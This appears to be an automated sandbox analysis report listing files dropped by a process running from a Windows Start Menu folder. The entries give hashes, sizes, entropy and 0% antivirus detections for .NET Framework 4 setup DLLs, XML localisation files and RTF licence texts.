                                                            Preview:{\rtf1\fbidis\ansi\ansicpg1255\deff0\deflang1033\deflangfe1033{\fonttbl{\f0\fswiss\fprq2\fcharset177 Tahoma;}{\f1\fswiss\fprq2\fcharset0 Tahoma;}{\f2\froman\fprq2\fcharset0 Times New Roman;}{\f3\froman\fprq2\fcharset177 Times New Roman;}}..{\colortbl ;\red0\green0\blue0;\red0\green0\blue255;}..{\*\generator Msftedit 5.41.21.2509;}\viewkind4\uc1\pard\rtlpar\nowidctlpar\sb120\sa120\qr\lang1037\b\f0\rtlch\fs20\'fa\'f0\'e0\'e9 \'f8\'f9\'e9\'e5\'ef \'ee\'f9\'ec\'e9\'ee\'e9\'ed \'f2\'e1\'e5\'f8 \'fa\'e5\'eb\'f0\'fa \lang1033\f1\ltrch MICROSOFT\f2\par..\pard\brdrb\brdrs\brdrw10\brsp20 \rtlpar\nowidctlpar\sb120\sa120\qr\f1 MICROSOFT .NET FRAMEWORK 4\lang1037\f0\rtlch \'f2\'e1\'e5\'f8 \'ee\'f2\'f8\'eb\'fa \'e4\'e4\'f4\'f2\'ec\'e4 \lang1033\f1\ltrch MICROSOFT WINDOWS\par..\lang1037\f0\rtlch\'f4\'f8\'e5\'f4\'e9\'ec \'ec\'f7\'e5\'e7 \'f9\'ec \lang1033\f1\ltrch MICROSOFT .NET FRAMEWORK 4\lang1037\f0\rtlch \'f2\'e1\'e5\'f8 \'ee\'f2\'f8\'eb\'fa \'e4\'e4\'f4\'f2\'ec\'e4 \lang1033\f1\ltrch MICROSOFT
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (723), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):86442
                                                            Entropy (8bit):3.674300926924721
                                                            Encrypted:false
                                                            SSDEEP:1536:Ji+5JLuNF70SNjPBzuXrXdJHbdi3kC4kL1:Ji+5JLyF70SNjPBzuXrXdJHbdi3kCZZ
                                                            MD5:89D4356E0F226E75CA71D48690E8EC15
                                                            SHA1:2336CAA971527977F47512BC74E88CEC3F770C7D
                                                            SHA-256:FCBB619DEB2D57B791A78954B0342DBB2FEF7DDD711066A0786C8EF669D2B385
                                                            SHA-512:FA03D55A4AAFE94CBF5C134A65BD809FC86C042BC1B8FFBC9A2A5412EB70A468551C05C44B6CE81F638DF43CCA599AA1DD6F42F2DF3012C8A95A3612DF7C821E
                                                            Malicious:false
                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.S.e.t.u.p. .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.". .x.m.l.n.s.:.i.r.o.n.m.a.n.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.".>..... . .<.L.o.c.a.l.i.z.e.d.D.a.t.a.>..... . . . .<.L.a.n.g.u.a.g.e.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.i.n._.O.S._.C.o.m.p.a.t.i.b.i.l.i.t.y._.M.o.d.e.).". .L.o.c.a.l.i.z.e.d.T.e.x.t.=.".A. .t.e.l.e.p...t.Q. .n.e.m. .f.u.t.t.a.t.h.a.t... .k.o.m.p.a.t.i.b.i.l.i.s. ...z.e.m.m...d.b.a.n... .T.o.v...b.b.i. .i.n.f.o.r.m...c.i... .a. .&.l.t.;.A. .H.R.E.F.=.&.q.u.o.t.;.h.t.t.p.:././.g.o...m.i.c.r.o.s.o.f.t...c.o.m./.f.w.l.i.n.k./.?.L.i.n.k.I.d.=.1.6.4.1.5.6.&.q.u.o.t.;.&.g.t.;.F.o.n.t.o.s. .f...j.l.b.a.n.&.l.t.;./.A.&.g.t.;. .o.l.v.a.s.h.a.t....."./.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.U.n.i.n.s.t.a.l.l.W.a.r.
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):18776
                                                            Entropy (8bit):5.210200964255437
                                                            Encrypted:false
                                                            SSDEEP:384:mTW68sRjOP2w99bfc/ta4V3mfCHpeEVn3i0MC4wWqyWpLXci2jpv5nNY:m+Aj0R99bfKtHVWfCJeEVn3i0MC44pMQ
                                                            MD5:C1BF3D63576D619B24837B72986DFAD4
                                                            SHA1:7392C7B478090831EB2E213BF1224E4F16FDD4D8
                                                            SHA-256:0995DD70D260673F954DE54FDBA53D55218C536034BE6342E135C7D514073869
                                                            SHA-512:597F327DF59B0F0CF39FC8753154E55CA8053F489F3FAA5A59C3E7F2115148FE4B49313A94C7CE802AF4B9A1D3FDDF92D3EDC60246E68B17F4CA57CFA3B33397
                                                            Malicious:false
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            • Antivirus: Virustotal, Detection: 0%
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:Rich Text Format data, version 1, ANSI, code page 1250, default language ID 1038
                                                            Category:dropped
                                                            Size (bytes):4254
                                                            Entropy (8bit):5.3269919672171735
                                                            Encrypted:false
                                                            SSDEEP:96:k8BfeEfTtXeTjXyZD+dtQRzrGJ6JwtxYMpDNeb6CZXKEp5/Eupwy9Ep+LM2:kgffCXPdOzSJ6JwkOBjC0V2
                                                            MD5:58E6E6D6258994D6A08C6101F11F302D
                                                            SHA1:DF2DB9DA70204CBB539D17DF860A6C45613EF086
                                                            SHA-256:70546BABD12AFAF9FFCC437712DF5491DDF9A6AF8AB4F319FC0EA23AFB186726
                                                            SHA-512:A4A992E2E44C8594E22849C3ED9019C32CF4085E90CC45F0E45A210E68A574A47BF1A06FA405B1F725E1A4DEFBD27E46FE52F3E7A829C8288EC0208BEAC3238B
                                                            Malicious:false
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (679), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):80060
                                                            Entropy (8bit):3.556654700353072
                                                            Encrypted:false
                                                            SSDEEP:384:4wFACg1fPK/YBZ3tMa9eIzNZNs4fzWmJVo5HnscuRv:/ACgNKjaVLJi2
                                                            MD5:EDA1EC689D45C7FAA97DA4171B1B7493
                                                            SHA1:807FE12689C232EBD8364F48744C82CA278EA9E6
                                                            SHA-256:80FAA30A7592E8278533D3380DCB212E748C190AAEEF62136897E09671059B36
                                                            SHA-512:8385A5DE4EB6B38169DD1EB03926BC6D4604545801F13D99CEE3ACEDE3D34EC9F9D96B828A23AE6246809DC666E67F77A163979679956297533DA40F9365BF2C
                                                            Malicious:false
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):18264
                                                            Entropy (8bit):5.142702232041524
                                                            Encrypted:false
                                                            SSDEEP:384:77n6Tg7AtONBKHno5hWXeWFLXci2jpvz2:7XAbs+ZMi2jpvz2
                                                            MD5:E4860FC5D4C114D5C0781714F3BF041A
                                                            SHA1:864CE88E8AB1DB9AFF6935F9231521B6B72D5974
                                                            SHA-256:6B2D479D2D2B238EC1BA9D14F9A68DC552BC05DCBCC9007C7BB8BE66DEFC643B
                                                            SHA-512:39B0A97C4E83D5CCA1CCCCE494831ADBC18DF1530C02E6A2C13DAE66150F66A7C987A26CECB5587EA71DD530C8BE1E46922FE8C65AE94145D90B0A057C06548D
                                                            Malicious:false
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            • Antivirus: Virustotal, Detection: 0%
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1040
                                                            Category:dropped
                                                            Size (bytes):3643
                                                            Entropy (8bit):5.117983582325958
                                                            Encrypted:false
                                                            SSDEEP:96:rwBfYOP/TfVTJDwXtxjCJEZ+jw/Njppm/F/ZaFgcT/okOct2:yfYXRzMjsA9/EFxDt2
                                                            MD5:6C9C19BFED724146512493F05CBA4F0F
                                                            SHA1:DE249075AAC70D4661ED559FD64DE9F33DE43DB5
                                                            SHA-256:C405AB9949C10619742AF1AF153521FFD85C16821324C16233B025F982A98CAD
                                                            SHA-512:709A522477121EE32152DBE7F90EE4B597621761854B55A791C07C9521FFB899A21C0B84351A68AC3A583B43A91AC5164EF34259D153D21B47C404B4313893B3
                                                            Malicious:false
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (538), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):68226
                                                            Entropy (8bit):4.416259780276574
                                                            Encrypted:false
                                                            SSDEEP:384:4wVzQOXe7GoXHoMIpYnxKJMlvWy0aO8rRnfJGnav:3QOu7GlCnkJMlvWy0aO8rRnfJ5
                                                            MD5:64FFA6FF8866A15AFF326F11A892BEAD
                                                            SHA1:378201477564507A481BA06EA1BC0620B6254900
                                                            SHA-256:7570390094C0A199F37B8F83758D09DD2CECD147132C724A810F9330499E0CBF
                                                            SHA-512:EA5856617B82D13C9A312CB4F10673DBC4B42D9AC5703AD871E8BDFCC6549E262E61288737AB8EBCF77219D24C0822E7DACF043D1F2D94A97C9B7EC0A5917EF2
                                                            Malicious:false
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):15704
                                                            Entropy (8bit):5.929554826924656
                                                            Encrypted:false
                                                            SSDEEP:192:Cg0rjUfwtW1+/FuZhS5CSJk/lhAW5kEW1QKPnEtObMacxc8hjeyveCXPX:5hC7mS53JkNSW5kEW1LXci2jpvJ
                                                            MD5:278FD7595B580A016705D00BE363612F
                                                            SHA1:89A299A9ABECB624C3606267371B7C07B74B3B26
                                                            SHA-256:B3ECD3AEA74D0D97539C4971C69F87C4B5FE478FC42A4A31F7E1593D1EBA073F
                                                            SHA-512:838D23D35D8D042A208E8FA88487CD1C72DA48F336157D03B9549DD55C75DA60A83F6DD2B3107EB3E5A24F3FAD70AE1629ACC563371711117C3C3E299B59D838
                                                            Malicious:false
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            • Antivirus: Virustotal, Detection: 0%
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:Rich Text Format data, version 1, ANSI, code page 932, default language ID 1033
                                                            Category:dropped
                                                            Size (bytes):10125
                                                            Entropy (8bit):4.144479793761895
                                                            Encrypted:false
                                                            SSDEEP:192:tEf13/qC2+PCsANROmuuU8EhZFJEj2VQoKOwyWAOxzpOh+uqaJgt2:tBtQoCnGDzhuqz2
                                                            MD5:75CE7D721BDB78F1020ACF2B206B1859
                                                            SHA1:CC0418DE8806811D21B19005BC5DB0092767F340
                                                            SHA-256:2ABDC7246E95E420B4E66CC3C07ACDB56FF390BCD524E0D8525D5BF345030A5A
                                                            SHA-512:FAFAC863DC825FC0B104751FE62CDA2C43048683F9D7E45659784206EA67F1AA98EA282AFC2A3A4BA287D03F73B21EC1E2F8C02F5D036CE96CAEFD851A5389E5
                                                            Malicious:false
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (509), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):65238
                                                            Entropy (8bit):4.384411743704147
                                                            Encrypted:false
                                                            SSDEEP:384:4wsx1QzSzXLGKgooDQA0pb5ywW4JSUQvEQzH/dv:egtqpb5yw5Jg
                                                            MD5:78C16DA54542C9ED8FA32FED3EFAF10D
                                                            SHA1:AD8CFE972C8A418C54230D886E549E00C7E16C40
                                                            SHA-256:E3E3A2288FF840AB0E7C5E8F7B4CFB1F26E597FB17CFC581B7728116BD739ED1
                                                            SHA-512:D9D7BB82A1D752A424BF81BE3D86ABEA484ACBB63D35C90A8EE628E14CF34A7E8A02F37D2EA82AA2CE2C9AA4E8416A7A6232C632B7655F2033C4AAAB208C60BF
                                                            Malicious:false
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):15192
                                                            Entropy (8bit):5.9622226182057325
                                                            Encrypted:false
                                                            SSDEEP:192:Hpix6f+jYxzekdPKNS0N7gVCAMWpCeWRQKPnEtObMacxc8hjeyveCXmo+:3ibMj0lgRMWpCeWRLXci2jpv8o+
                                                            MD5:FCFD69EC15A6897A940B0435439BF5FC
                                                            SHA1:6DE41CABDB45294819FC003560F9A2D1E3DB9A7B
                                                            SHA-256:90F377815E3C81FC9AE5F5B277257B82811417CA3FFEACD73BAB530061B3BE45
                                                            SHA-512:4DC3580B372CEE1F4C01569BAEA8CD0A92BC613648DB22FF1855920E47387A151964B295A1126597B44BB0C596E8757B1FCF47CDA010F9BBB15A88F97F41B8BF
                                                            Malicious:false
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            • Antivirus: Virustotal, Detection: 0%
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:Rich Text Format data, version 1, ANSI, code page 949, default language ID 1033
                                                            Category:dropped
                                                            Size (bytes):12687
                                                            Entropy (8bit):4.39170120937692
                                                            Encrypted:false
                                                            SSDEEP:192:MUf0PVF4MjeKojIfE6wK+b/mIr4tIAcAIce5rD6O1IuonKZim+dfNAW6qUK84Zn+:aK0wB/Tr4TmckIuCm+TAWdUN/re2
                                                            MD5:A3B318528E286EC387E81934E5D3B081
                                                            SHA1:CEDCC08D008E21C0E88EEF8354DAB8CFF2EF51AD
                                                            SHA-256:2954EDB51628942A37A9BF58DA628932638C35ED61744892E42623FE4CCD06A0
                                                            SHA-512:3544D9BE654C859CDE2B9CD8614C5ABED89E488DFEE2F51AB92A509873DC504942E375388D12379DE9D29DEEDE662667F8CC4BC6D2DCD50C5AC865CE6C44352D
                                                            Malicious:false
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (658), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):79634
                                                            Entropy (8bit):3.5656146816718155
                                                            Encrypted:false
                                                            SSDEEP:384:4wCsfDNzgDbRiRVqxdYRF405vYtyVB1HaAzTGZUeJvuQFKhlQ5gwJBKQauJf1tSY:jbZKbRyVqb82IB+GlQ5gwJBzauJzkA
                                                            MD5:6506B4E64EBF6121997FA227E762589F
                                                            SHA1:71BC1478C012D9EC57FC56A5266DD325B7801221
                                                            SHA-256:415112AE783A87427C2FADD7B010ADE4F1A7C23B27E4B714B7B507C16B572A1C
                                                            SHA-512:39024EA9D42352F7C1BD6FEFE0574054ECEB4059F773CFAEB26C42FAADA2540AE95FB34718D30CCB6DA157D2597F80D12A024461FBD0E8D510431BA6FFA81EC2
                                                            Malicious:false
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):19288
                                                            Entropy (8bit):5.101791972320269
                                                            Encrypted:false
                                                            SSDEEP:384:3124Y0WDDkowwX8OZjv1t2WlLeWvLXci2jpvc:lYZhzMi2jpvc
                                                            MD5:76D6E9F15D842E6A56EE42C9C5CCABCA
                                                            SHA1:36E6FA7C032F69DEA2C34B5934AC556AAE738CBB
                                                            SHA-256:A961DE62DA74B05EAF593BB78A4A5A4C5586FE2D0D4A45D99675D03E7F01D7C5
                                                            SHA-512:F9E04AA073EBF98BDD13F6A0A9214DDA42CD5FDFEC24873CF171B77D31408CA6698BF0C9D931A93BDD7A54FE55A9E6394F2C8050C7E847455E4A36585E36D6EB
                                                            Malicious:false
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            • Antivirus: Virustotal, Detection: 0%
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                            Category:dropped
                                                            Size (bytes):3546
                                                            Entropy (8bit):5.203062637938479
                                                            Encrypted:false
                                                            SSDEEP:96:rTBfrnjTsVT08DfQhtJlIcm3wEM8LPMpDlGu3x+O0H+Ozo+SBT+OZt6S2:ZfLltGwEMAPOkukO0eONNOT2
                                                            MD5:305AE79EC7D0E8D1F826D70D7D469BB4
                                                            SHA1:BBE8FFD83FCA6C013A20CDEE6EA0AFFD988C4815
                                                            SHA-256:69537AEF05EDFB55EC32897B3DD59724A825FDDECCD92BDD5E8840CB92B1B383
                                                            SHA-512:A7368CEC366E8F717F3FD51FA71133A02C5E7B44D095B849320E15F8D95DC1A58AB977FA9A4C1633FCD1AD82D929FF8FB2271C816BE8B2B8892D7389E3E3EACD
                                                            Malicious:false
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (653), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):79296
                                                            Entropy (8bit):3.5898407770439955
                                                            Encrypted:false
                                                            SSDEEP:384:4wn2IhI4z6T1sHCqeHveRWUw+KbGpK+9C/E6b2NJBf2OEuv:V9hI4z6T1siqeHveRhAo9CM6b2NJBuOD
                                                            MD5:120104FA24709C2A9D8EFC84FF0786CD
                                                            SHA1:B513FA545EFAE045864D8527A5EC6B6CEBE31BB9
                                                            SHA-256:516525636B91C16A70AEF8D6F6B424DC1EE7F747B8508B396EE88131B2BB0947
                                                            SHA-512:1EA8EB2BE9D5F4EF6F1F2C0D90CB228A9BB58D7143CCAFE77E18CE52EC4ACA25DDE0BA18430FD4D3D7962D079CCBE7E2552B2C7090361E03C6FDFB7C2B9C7325
                                                            Malicious:false
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):17752
                                                            Entropy (8bit):5.209166644217636
                                                            Encrypted:false
                                                            SSDEEP:384:cNeu+Oeu+Oeu+rW56qxYBlgFAcUm/rW9eWoLXci2jpv72:TIxYBegm/WgMi2jpv72
                                                            MD5:BACEA57A781C43738A3B065103479BB5
                                                            SHA1:45E277CC370150293252535D5371B2C0F79B4874
                                                            SHA-256:8B372354A54643F1159FAB562D0F2DFE21F08A3D67DBB7337242846316D3BEC4
                                                            SHA-512:CD0BB774D1373A7B735AE9A867387527DAB28D7635B5DE881F92B66ECD87DA4E8F4605F3DF093294CA3060F993220472D3C926780BEB57BF3E90ECC081F0F1E1
                                                            Malicious:false
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            • Antivirus: Virustotal, Detection: 0%
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1044
                                                            Category:dropped
                                                            Size (bytes):3046
                                                            Entropy (8bit):5.1859499604057495
                                                            Encrypted:false
                                                            SSDEEP:48:rPN3nffnyzInT7BjTgLDRn0l392N4S2ZOMb5XgNRc9q5QB34pg5lqM9TX/ufMpDn:rPBffyUnT7BjTADRn0lN2N4S2wG5wNRq
                                                            MD5:830EBCED0F03F267EEE7A5167C4E91A4
                                                            SHA1:740075166941E5623ECB488B0390F25A84FEEC77
                                                            SHA-256:2D0B46674BB383A56E6061D25F0D446C8B50C83C92269A3FCCB657429E9EF4BE
                                                            SHA-512:CD146C8F35C1095E142EEDF2B486A22593A417138CAE35FBA00DEFB5395D6DAA34C84B6A345AE88A5B365D4E17190FD3C7F3AA384D2D4472E0413F432280F53E
                                                            Malicious:false
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (691), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):82374
                                                            Entropy (8bit):3.6806551409534465
                                                            Encrypted:false
                                                            SSDEEP:768:lz2ue+xTxXUpUqTvvUOfUs6LArUpFymrqQtr8BAyfO4RkSzXunasvJH2TF0wpYl7:lz2ue+xTxXUpUOvvUOfUs6LqTavdJkUr
                                                            MD5:BDB583C7A48F811BE3B0F01FCEA40470
                                                            SHA1:E8453946A6B926E4F4AE5B02BA1D648DAF23E133
                                                            SHA-256:611B7B7352188ADFFD6380B9C8A85B8FF97C09A1C293BB7AC0EF5478A0E18AC8
                                                            SHA-512:27B02226F8F86CA4D00789317C79E8CA0089F5B910BED14AA664EEAB6BE66E98DE3BAFD7670C895D70AB9C34ECE5F05199F3556FDDC1B165904E3432A51C008D
                                                            Malicious:false
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):18264
                                                            Entropy (8bit):5.2854545598714635
                                                            Encrypted:false
                                                            SSDEEP:192:fa1YUfwxWVxSIn+hnISv7N/blaRr26WneWAQKPnEtObMacxc8hjeyveCXW:iN2Gan9xblaRr26WneWALXci2jpvQ
                                                            MD5:550C79640EEE713C73EB67B0736A92E6
                                                            SHA1:51656BB182048F0ABFC57DC2DF9703D59E264442
                                                            SHA-256:F90002DA2068F868D5A710444EA30F91AE2229DBEB660166C1E28935E4AB6078
                                                            SHA-512:F90A9A5C399DEC2649E8EC088139E5FE4DD0419BDF7B5988BE8F437A35040A1E0D2F03D326B8C38B2F4F1CFDBE0269445120D95061BD691296E7C9B20C5EAC31
                                                            Malicious:false
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            • Antivirus: Virustotal, Detection: 0%
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                            Category:dropped
                                                            Size (bytes):4040
                                                            Entropy (8bit):5.362038982382671
                                                            Encrypted:false
                                                            SSDEEP:96:rTBfQaJRTIRTjzH+oDgQUoIs89FcG5ywI5Et/+TMm9MpDcA/+MvsNcUOsG9jeLdp:Zfo+Bs18ncG5Y5Et/+Z9OwAjs7OtRwdp
                                                            MD5:BB93B108D4BE954133380F7709E7BA1E
                                                            SHA1:34376037B3C5879142796A2F524E5B3EA6097ED1
                                                            SHA-256:4F2D6A8979C89592877555FE8F576D5F631132452AFE86114D35E9531A1CA948
                                                            SHA-512:69C60EF8C0E6A8F7A92EC9A9C94C99F6DDE39477D8DEE041ABF7A164025D7EBFC9F0C7399AD8C9ED150861B00FC47F1F1CB40BB245AA87ED7904B1BAE6A4271B
                                                            Malicious:false
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (669), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):80738
                                                            Entropy (8bit):3.581949939963976
                                                            Encrypted:false
                                                            SSDEEP:384:4wl7DAQput9emRem6cvMOem6QemIAY/YEQTeQoqk7EHd9nKxXq5fKsLaG5m73Rdv:geOeqeCe1CkyJtG07g
                                                            MD5:A03D2063D388FC7A1B4C36D85EFA5A1A
                                                            SHA1:88BD5E2FF285EE421CCC523F7582E05A8C3323F8
                                                            SHA-256:61D8339E89A9E48F8AE2D929900582BB8373F08D553EC72D5E38A0840B47C8A3
                                                            SHA-512:3A219F36E57D90CA92E9FAEC4DFD34841C2C9244DA4FE7E1D70608DDE7857AA36325BDB46652A42922919F782BB7C97F567E69A9FC51942722B8FD66CD4ECAF0
                                                            Malicious:false
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):18264
                                                            Entropy (8bit):5.203641313145023
                                                            Encrypted:false
                                                            SSDEEP:192:zjkTnUfwVWwwZFf7TOS7LDoKGslNDGf8BjWNeWSQKPnEtObMacxc8hjeyveCXKuj:zom6QT7FprmmWNeWSLXci2jpv3j
                                                            MD5:86CB58F2B6BC1174D200D0ABE5497233
                                                            SHA1:F1174409A44D922C23F376C6BC7609BBDAD5016C
                                                            SHA-256:DD7FB50E88355F46D619D89E47D3057ACC1C069178BA81839970BB13479FCF4C
                                                            SHA-512:AD4C9124F2459FB83C977B235B7ACDDA86AFAEBE9FEBD8BE084AA50E87AB091331A8724EC517D5096487970A3992C7E3D255CDA31DC494544CABA5DEF9C93DD1
                                                            Malicious:false
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            • Antivirus: Virustotal, Detection: 0%
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                            Category:dropped
                                                            Size (bytes):3683
                                                            Entropy (8bit):5.188584376027454
                                                            Encrypted:false
                                                            SSDEEP:96:rTBfAlMu9fTp/9fTdIDsGJ1KlhREerHr7uStmESWp55ztFuMpDl/BRwZ+qf+J4Ed:ZfeuqhGeHVIErn1zuO9BC8q2WEHt+B2
                                                            MD5:E43708161843A33D34D6FDF966D36397
                                                            SHA1:2E5C0450CEBD9A737A90908EEDDAAE2D0B3E2940
                                                            SHA-256:0AF1F04F416712387BF87C93FA846B4E8EB0AC25E284A2A3578C58E2724E2778
                                                            SHA-512:FB334D29BBBC2D19D20C5260C55BF83D9D6D242C6A8F04AC88F8280A63E6AF32FB5D96703E43D39F6863D17B27D9E0E36CBAB1099127E5FA281255A19AE39E0D
                                                            Malicious:false
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (712), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):81482
                                                            Entropy (8bit):4.270033694989682
                                                            Encrypted:false
                                                            SSDEEP:384:4w7iPuXsPXBUhOLGvVVA5/Fpn9zJop9TE+zkX6JS/5cGhj/6v:MP5XyZVrJF
                                                            MD5:349B52A81342A7AFB8842459E537ECC6
                                                            SHA1:6268343E82FBBABE7618BD873335A8F9F84ED64D
                                                            SHA-256:992BF5AEB06AA3701D50C23FA475B4B86D8997383C9F0E3425663CFBD6B8A2A5
                                                            SHA-512:EF4CBD3F7F572A9F146A524CFBC2EFBD084E6C70A65B96A42339ADC088E3F0524BC202548340969481E7F3DF3AC517AC34B200B56A3B9957802ABD0EFA951C49
                                                            Malicious:false
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):18264
                                                            Entropy (8bit):5.548909804205606
                                                            Encrypted:false
                                                            SSDEEP:192:eRBvnUfwVWBC623DV3SD1tt9WfXHT7nMsmxeW1QKPnEtObMacxc8hjeyveCXgFK1:e/C6+URiD1vwLoPeW1LXci2jpvaFHM
                                                            MD5:7EF74AF6AB5760950A1D233C582099F1
                                                            SHA1:BF79FF66346907446F4F95E1E785A03CA108EB5D
                                                            SHA-256:658398F1B68D49ABD37FC3B438CD564992D4100ED2A0271CBF83173F33400928
                                                            SHA-512:BBBB099AD24F41785706033962ACFC75039F583BEED40A7CDC8EDA366AB2C77F75A5B2792CF6AACB80B39B6B1BB84ECE372BE926FF3F51028FB404D2F6334D78
                                                            Malicious:false
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            • Antivirus: Virustotal, Detection: 0%
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                            Category:dropped
                                                            Size (bytes):54456
                                                            Entropy (8bit):4.950349023670169
                                                            Encrypted:false
                                                            SSDEEP:768:3CR6rdlWFJv3zGz9tWQ2ni8UNo/8PZrS14Z:3CcrMeDZ
                                                            MD5:2277852A45DA18B12BEEC5FB6F08CDC9
                                                            SHA1:E564862D098BD111430C4208EAA1ADD5CD52A601
                                                            SHA-256:59AD806664E3CE4A024452985C4602D5610126A16FC36ADE018A9756ACCC92CC
                                                            SHA-512:ED9726D207479E4DF494C6AF17E64909EA6649DDD8BDC3E37229A73270B4A159B2B11C1ADD462871DD40A23033E6B3F8A26E3EA1FA6E3B7316153AF13B316CD2
                                                            Malicious:false
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (622), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):77680
                                                            Entropy (8bit):3.602060477304833
